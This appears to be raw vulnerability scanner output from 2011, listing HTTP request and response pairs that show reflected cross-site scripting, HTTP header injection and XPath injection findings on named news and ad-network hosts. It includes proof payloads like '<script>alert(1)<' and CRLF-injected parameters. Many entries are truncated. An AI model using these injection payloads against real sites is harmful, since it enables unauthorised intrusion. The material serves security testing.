HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Date: Sun, 04 Sep 2011 00:42:30 GMT Content-Length: 2862 <b>This is an unclosed string.</b><br/> at MS.Internal.Xml.XPath.XPathScanner.ScanString( ...[SNIP]... <br/> at System.Xml.XPath.XPathExpression.Compile ...[SNIP]... |
Severity: | High |
Confidence: | Firm |
Host: | http://content.usatoday |
Path: | /communities/campusr |
GET /communities/campusr Host: content.usatoday.com Proxy-Connection: keep-alive Referer: http://www.google.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: private Content-Type: text/html; charset=utf-8 Vary: Accept-Encoding Server: Microsoft-IIS/7.5 X-AspNet-Version: 2.0.50727 P3P: CP="CAO CUR ADM DEVa TAIi PSAa PSDa CONi OUR OTRi IND PHY ONL UNI COM NAV DEM", POLICYREF="URI" Date: Sun, 04 Sep 2011 00:42:30 GMT Content-Length: 2862 <b>This is an unclosed string.</b><br/> at MS.Internal.Xml.XPath.XPathScanner.ScanString( ...[SNIP]... <br/> at System.Xml.XPath.XPathExpression.Compile ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://c7.zedo.com |
Path: | /bar/v16-504/c5/jsc/fm.js |
GET /bar/v16-504/c5/jsc/fm.js Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.charlotte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZFFBbh=977B826,20|121_977 |
GET /bar/v16-504/c5/jsc/fm.js Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.charlotte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZFFBbh=977B826,20|121_977 |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=305:b395d"-alert(1)- Set-Cookie: FFcat=305,825,15:305,825 Set-Cookie: FFad=39:1:1:0:1;expires ETag: "8710bb37-8952-4aa4e Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=213 Expires: Sun, 04 Sep 2011 01:08:03 GMT Date: Sun, 04 Sep 2011 01:04:30 GMT Content-Length: 1016 Connection: close // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var y10=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=263;var zzPat='b395d"-alert(1)- if(typeof zzStr=='undefined'){ var zzStr="q=b395d"-alert(1)- if(zzuid=='unknown')zzuid var zzhasAd=undefined; var zzpixie = new Image(); var zzRandom = Math.random(); var zzD ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://c7.zedo.com |
Path: | /bar/v16-504/c5/jsc/fm.js |
GET /bar/v16-504/c5/jsc/fm.js Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.charlotte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZFFBbh=977B826,20|121_977 |
GET /bar/v16-504/c5/jsc/fm.js Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.charlotte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZFFBbh=977B826,20|121_977 |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=305:609c0'-alert(1)- Set-Cookie: FFcat=305,825,15:305,825 Set-Cookie: FFad=47:1:1:0:1;expires ETag: "8710bb37-8952-4aa4e Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=212 Expires: Sun, 04 Sep 2011 01:08:03 GMT Date: Sun, 04 Sep 2011 01:04:31 GMT Content-Length: 1016 Connection: close // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var y10=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=263;var zzPat='609c0'-alert(1)- if(typeof zzStr=='undefined'){ var zzStr="q=609c0'-alert(1)- if(zzuid=='un ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://c7.zedo.com |
Path: | /bar/v16-504/c5/jsc/fm.js |
GET /bar/v16-504/c5/jsc/fm.js Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.charlotte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZFFBbh=977B826,20|121_977 |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=305:54f5b 606b90e0140,3654a';expires=Sun, 04 Sep 2011 05: 00:00 GMT;domain=.zedo.com;path Set-Cookie: FFcat=305,825,15:305,825 Set-Cookie: FFad=95:4:4:0:1;expires ETag: "8710bb37-8952-4aa4e Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=210 Expires: Sun, 04 Sep 2011 01:08:03 GMT Date: Sun, 04 Sep 2011 01:04:33 GMT Content-Length: 950 Connection: close // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var y10=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=263;var zzPat='54f5b ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://c7.zedo.com |
Path: | /bar/v16-504/c5/jsc/fmr |
GET /bar/v16-504/c5/jsc/fmr Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.charlotte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZFFBbh=977B826,20|121_977 |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Type: application/x-javascript Set-Cookie: FFpb=305:386bc 457ad93187f,54f5b;expires=Sun, 04 Sep 2011 05: 00:00 GMT;domain=.zedo.com;path Set-Cookie: FFcat=305,825,15:305,825 Set-Cookie: FFad=37:9:9:1:1;expires ETag: "cff199-8747-4aa4e78 Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=192 Expires: Sun, 04 Sep 2011 01:08:03 GMT Date: Sun, 04 Sep 2011 01:04:51 GMT Content-Length: 948 Connection: close // Copyright (c) 2000-2011 ZEDO Inc. All Rights Reserved. var y10=new Image(); var zzD=window.document; if(typeof zzuid=='undefined'){ var zzuid='unknown';} var zzSection=263;var zzPat='386bc ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://c7.zedo.com |
Path: | /utils/ecSet.js |
GET /utils/ecSet.js?v=72e24%0d%0acc2e3ed201c&d=.zedo.com HTTP/1.1 Host: c7.zedo.com Proxy-Connection: keep-alive Referer: http://www.charlotte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: ZFFBbh=977B826,20|121_977 |
HTTP/1.1 200 OK Server: ZEDO 3G Content-Length: 1 Content-Type: application/x-javascript Set-Cookie: 72e24 cc2e3ed201c;expires=Tue, 04 Oct 2011 05: 00:00 GMT;domain=.zedo.com;path ETag: "2971d9-1f5-47f29204ac3c0 Vary: Accept-Encoding P3P: CP="NOI DSP COR CURa ADMa DEVa PSDa OUR BUS UNI COM NAV OTC", policyref="/w3c/p3p.xml" Cache-Control: max-age=1466 Date: Sun, 04 Sep 2011 01:05:04 GMT Connection: close |
Severity: | High |
Confidence: | Certain |
Host: | http://tacoda.at.atwola |
Path: | /rtx/r.js |
GET /rtx/r.js?cmd=LCN&si=8a172%0d%0a0373f631884&pi=-&xs=3&pu=http%253A/ Host: tacoda.at.atwola.com Proxy-Connection: keep-alive Referer: http://www.charlotte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Date: Sun, 04 Sep 2011 01:06:51 GMT Server: Apache/1.3.37 (Unix) mod_perl/1.29 P3P: policyref="http://www P3P: policyref="http://www Cache-Control: max-age=900 Expires: Sun, 04 Sep 2011 01:21:51 GMT Set-Cookie: ATTACID=a3Z0aWQ9MTc2 Set-Cookie: ANRTT=; path=/; expires=Sun, 11-Sep-11 01:06:51 GMT; domain=tacoda.at.atwola Set-Cookie: Tsid=0^1315097086 0373f631884^1315098411^1315100211; path=/; expires=Sun, 04-Sep-11 01:36:51 GMT; domain=tacoda.at.atwola Set-Cookie: TData=99999|^; expires=Wed, 29-Aug-12 01:06:51 GMT; path=/; domain=tacoda.at.atwola Set-Cookie: N=2:b2269f6902917396 Set-Cookie: ATTAC=a3ZzZWc9OTk5OTk6; expires=Wed, 29-Aug-12 01:06:51 GMT; path=/; domain=.at.atwola.com ntCoent-Length: 102 Content-Type: application/x-javascript Content-Length: 102 var ANUT=1; var ANOO=0; var ANSR=1; var ANTID='1765ifu1akkc79'; var ANSL='99999|^'; ANRTXR(); |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.turn.com |
Path: | /server/pixel.htm |
GET /server/pixel.htm?fpid=53bfc"><script>alert(1)< Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://tap2-cdn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uid=2925993182975414771 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=8995059535480416422; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:05:50 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 04 Sep 2011 01:05:49 GMT Content-Length: 384 <html> <head> </head> <body> <iframe name="turn_sync_frame" width="0" height="0" frameborder="0" src="http://cdn.turn.com marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://ad.turn.com |
Path: | /server/pixel.htm |
GET /server/pixel.htm?fpid=6 Host: ad.turn.com Proxy-Connection: keep-alive Referer: http://tap2-cdn User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: uid=2925993182975414771 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 P3P: policyref="/w3c/p3p.xml", CP="NOI CURa DEVa TAIa PSAa PSDa IVAa IVDa OUR IND UNI NAV" Cache-Control: max-age=0, no-cache, no-store, private, must-revalidate, s-maxage=0 Pragma: no-cache Set-Cookie: uid=8995059535480416422; Domain=.turn.com; Expires=Fri, 02-Mar-2012 01:05:50 GMT; Path=/ Content-Type: text/html;charset=UTF-8 Vary: Accept-Encoding Date: Sun, 04 Sep 2011 01:05:49 GMT Content-Length: 384 <html> <head> </head> <body> <iframe name="turn_sync_frame" width="0" height="0" frameborder="0" src="http://cdn.turn.com marginwidth="0" marginheight="0" vspace="0" hspace="0" allowtransparency="true" scrolling="no"> ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://admeld.adnxs.com |
Path: | /usersync |
GET /usersync?calltype=admeld Host: admeld.adnxs.com Proxy-Connection: keep-alive Referer: http://www.sacbee.com Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: icu=ChIIrIsBEAoYASAB |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:02:33 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=9223372036854775807 Content-Type: application/x-javascript Date: Sun, 04 Sep 2011 01:02:33 GMT Content-Length: 183 document.write('<img src="http://tag.admeld |
Severity: | High |
Confidence: | Certain |
Host: | http://admeld.adnxs.com |
Path: | /usersync |
GET /usersync?calltype=admeld Host: admeld.adnxs.com Proxy-Connection: keep-alive Referer: http://www.sacbee.com Cache-Control: max-age=0 User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: icu=ChIIrIsBEAoYASAB |
HTTP/1.1 200 OK Cache-Control: no-store, no-cache, private Pragma: no-cache Expires: Sat, 15 Nov 2008 16:00:00 GMT P3P: CP="OTI DSP COR ADMo TAIo PSAo PSDo CONo OUR SAMo OTRo STP UNI PUR COM NAV INT DEM STA PRE LOC" Set-Cookie: sess=1; path=/; expires=Mon, 05-Sep-2011 01:02:53 GMT; domain=.adnxs.com; HttpOnly Set-Cookie: uuid2=9223372036854775807 Content-Type: application/x-javascript Date: Sun, 04 Sep 2011 01:02:53 GMT Content-Length: 183 document.write('<img src="http://tag.admeld |
Severity: | High |
Confidence: | Certain |
Host: | http://affiliates |
Path: | /Widgets/EmailSignup.aspx |
GET /Widgets/EmailSignup.aspx Host: affiliates.eblastengine Proxy-Connection: keep-alive Referer: http://www.charlotte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: public, max-age=60 Content-Type: text/html; charset=utf-8 Expires: Sun, 04 Sep 2011 01:04:01 GMT Last-Modified: Sun, 04 Sep 2011 01:03:01 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="NOI DSP COR NID CUR PSDa OUR STP STA" Date: Sun, 04 Sep 2011 01:03:00 GMT Content-Length: 6969 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Email S ...[SNIP]... <table id="tblWidget" cellpadding="0" cellspacing="0" border="0" style="width:275px;height ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://affiliates |
Path: | /Widgets/EmailSignup.aspx |
GET /Widgets/EmailSignup.aspx Host: affiliates.eblastengine Proxy-Connection: keep-alive Referer: http://www.charlotte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: public, max-age=60 Content-Type: text/html; charset=utf-8 Expires: Sun, 04 Sep 2011 01:03:41 GMT Last-Modified: Sun, 04 Sep 2011 01:02:41 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="NOI DSP COR NID CUR PSDa OUR STP STA" Date: Sun, 04 Sep 2011 01:02:41 GMT Content-Length: 6922 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Email S ...[SNIP]... <input type="hidden" name="hdnWCGUID" id="hdnWCGUID" value="29DFC999-F0F3-482A ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://affiliates |
Path: | /Widgets/EmailSignup.aspx |
GET /Widgets/EmailSignup.aspx Host: affiliates.eblastengine Proxy-Connection: keep-alive Referer: http://www.charlotte User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: text/html,application Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Cache-Control: public, max-age=60 Content-Type: text/html; charset=utf-8 Expires: Sun, 04 Sep 2011 01:04:11 GMT Last-Modified: Sun, 04 Sep 2011 01:03:11 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 X-AspNet-Version: 4.0.30319 X-Powered-By: ASP.NET P3P: CP="NOI DSP COR NID CUR PSDa OUR STP STA" Date: Sun, 04 Sep 2011 01:03:10 GMT Content-Length: 6967 <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org <head> <title>Email S ...[SNIP]... <table id="tblWidget" cellpadding="0" cellspacing="0" border="0" style="width:275be580"style="x:expression ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://altfarm.mediaplex |
Path: | /ad/js/13966-88303-3335-5 |
GET /ad/js/13966-88303-3335-5 Host: altfarm.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.reuters.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=993782327310; mojo3=3484:36959; mojo2=3484:8030 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: no-store Pragma: no-cache Expires: 0 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV" Content-Type: text/html Content-Length: 545 Date: Sun, 04 Sep 2011 00:45:45 GMT document.write('<a target="_blank" href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://altfarm.mediaplex |
Path: | /ad/js/13966-88303-3335-5 |
GET /ad/js/13966-88303-3335-5 Host: altfarm.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.reuters.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=993782327310; mojo3=3484:36959; mojo2=3484:8030 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: no-store Pragma: no-cache Expires: 0 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV" Content-Type: text/html Content-Length: 545 Date: Sun, 04 Sep 2011 00:45:47 GMT document.write('<a target="_blank" href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://altfarm.mediaplex |
Path: | /ad/js/13966-88303-3335-5 |
GET /ad/js/13966-88303-3335-5 Host: altfarm.mediaplex.com Proxy-Connection: keep-alive Referer: http://www.reuters.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: svid=993782327310; mojo3=3484:36959; mojo2=3484:8030 |
HTTP/1.1 200 OK Server: Apache-Coyote/1.1 Cache-Control: no-store Pragma: no-cache Expires: 0 P3P: policyref="/w3c/p3p.xml", CP="NOI DSP COR PSAo PSDo OUR IND UNI COM NAV" Content-Type: text/html Content-Length: 548 Date: Sun, 04 Sep 2011 00:45:49 GMT document.write('<a target="_blank" href="http://ad ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://api.bit.ly |
Path: | /shorten |
GET /shorten?version=2.0.1 Host: api.bit.ly Proxy-Connection: keep-alive Referer: http://www.reuters.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _bit=4e5e58aa-0030b-0228e |
HTTP/1.1 200 OK Server: nginx Date: Sun, 04 Sep 2011 00:46:12 GMT Content-Type: application/javascript; charset=utf-8 Connection: keep-alive Content-Length: 356 Etag: "573ac502eb2353400a5 processBitlyURLcc1c2<script>alert(1)< ...[SNIP]... |
Severity: | High |
Confidence: | Certain |
Host: | http://api.bit.ly |
Path: | /shorten |
GET /shorten?version=2.0.1 Host: api.bit.ly Proxy-Connection: keep-alive Referer: http://www.reuters.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: _bit=4e5e58aa-0030b-0228e |
HTTP/1.1 200 OK Server: nginx Date: Sun, 04 Sep 2011 00:46:14 GMT Content-Type: application/javascript; charset=utf-8 Connection: keep-alive Content-Length: 358 Etag: "2f364296de6d49e458e processBitlyURL({ |
Severity: | High |
Confidence: | Certain |
Host: | http://api.bizographics |
Path: | /v1/profile.redirect |
GET /v1/profile.redirect?api Host: api.bizographics.com Proxy-Connection: keep-alive Referer: http://www.reuters.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BizoID=6439dd87-a6df-42d4 |
HTTP/1.1 403 Forbidden Cache-Control: no-cache Content-Type: text/plain Date: Sun, 04 Sep 2011 00:57:41 GMT P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Pragma: no-cache Server: nginx/0.7.61 Set-Cookie: BizoID=6439dd87-a6df-42d4 Content-Length: 91 Connection: keep-alive Unknown API key: (798c7ba2e6b04aec86d |
Severity: | High |
Confidence: | Certain |
Host: | http://api.bizographics |
Path: | /v1/profile.redirect |
GET /v1/profile.redirect?api Host: api.bizographics.com Proxy-Connection: keep-alive Referer: http://www.reuters.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: BizoID=6439dd87-a6df-42d4 |
HTTP/1.1 403 Forbidden Cache-Control: no-cache Content-Type: text/plain Date: Sun, 04 Sep 2011 00:57:58 GMT P3P: CP="NON DSP COR CURa ADMo DEVo TAIo PSAo PSDo OUR DELa IND PHY ONL UNI COM NAV DEM" Pragma: no-cache Server: nginx/0.7.61 Set-Cookie: BizoID=6439dd87-a6df-42d4 Content-Length: 58 Connection: keep-alive Unknown Referer: 2c114<script>alert(1)< |
Severity: | High |
Confidence: | Firm |
Host: | http://api.echoenabled |
Path: | /v1/search |
GET /v1/search?callback Host: api.echoenabled.com Proxy-Connection: keep-alive Referer: http://www.reuters.com User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* |
HTTP/1.1 200 OK Connection: close Server: Yaws/1.85 Yet Another Web Server Date: Sun, 04 Sep 2011 00:50:24 GMT Content-Length: 161 Content-Type: application/x-javascript; charset="utf-8" jQuery16108104765831 |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=87d745<script>alert(1)< Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://content.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8-80.67.74.150 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sun, 18 Sep 2011 00:45:17 GMT Date: Sun, 04 Sep 2011 00:45:17 GMT Content-Length: 1249 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... E.purge=function(a){try COMSCORE.beacon({c1:"87d745<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2=2113 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://content.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8-80.67.74.150 |
HTTP/1.1 200 OK Content-Type: application/x-javascript Vary: Accept-Encoding Cache-Control: private, no-transform, max-age=1209600 Expires: Sun, 18 Sep 2011 00:45:18 GMT Date: Sun, 04 Sep 2011 00:45:18 GMT Content-Length: 1249 Connection: close if(typeof COMSCORE=="undefined") ...[SNIP]... h-1;b>=0;b--){f=COMSCORE COMSCORE.beacon({c1:"8", c2:"2113", c3:"13", c4:"13473", c5:"45394", c6:"", c10:"239096ab874<script>alert(1)< |
Severity: | High |
Confidence: | Certain |
Host: | http://b.scorecardre |
Path: | /beacon.js |
GET /beacon.js?c1=8&c2=2113 Host: b.scorecardresearch.com Proxy-Connection: keep-alive Referer: http://content.usatoday User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/535.1 (KHTML, like Gecko) Chrome/13.0.782.220 Safari/535.1 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,* Cookie: UID=9951d9b8-80.67.74.150 |
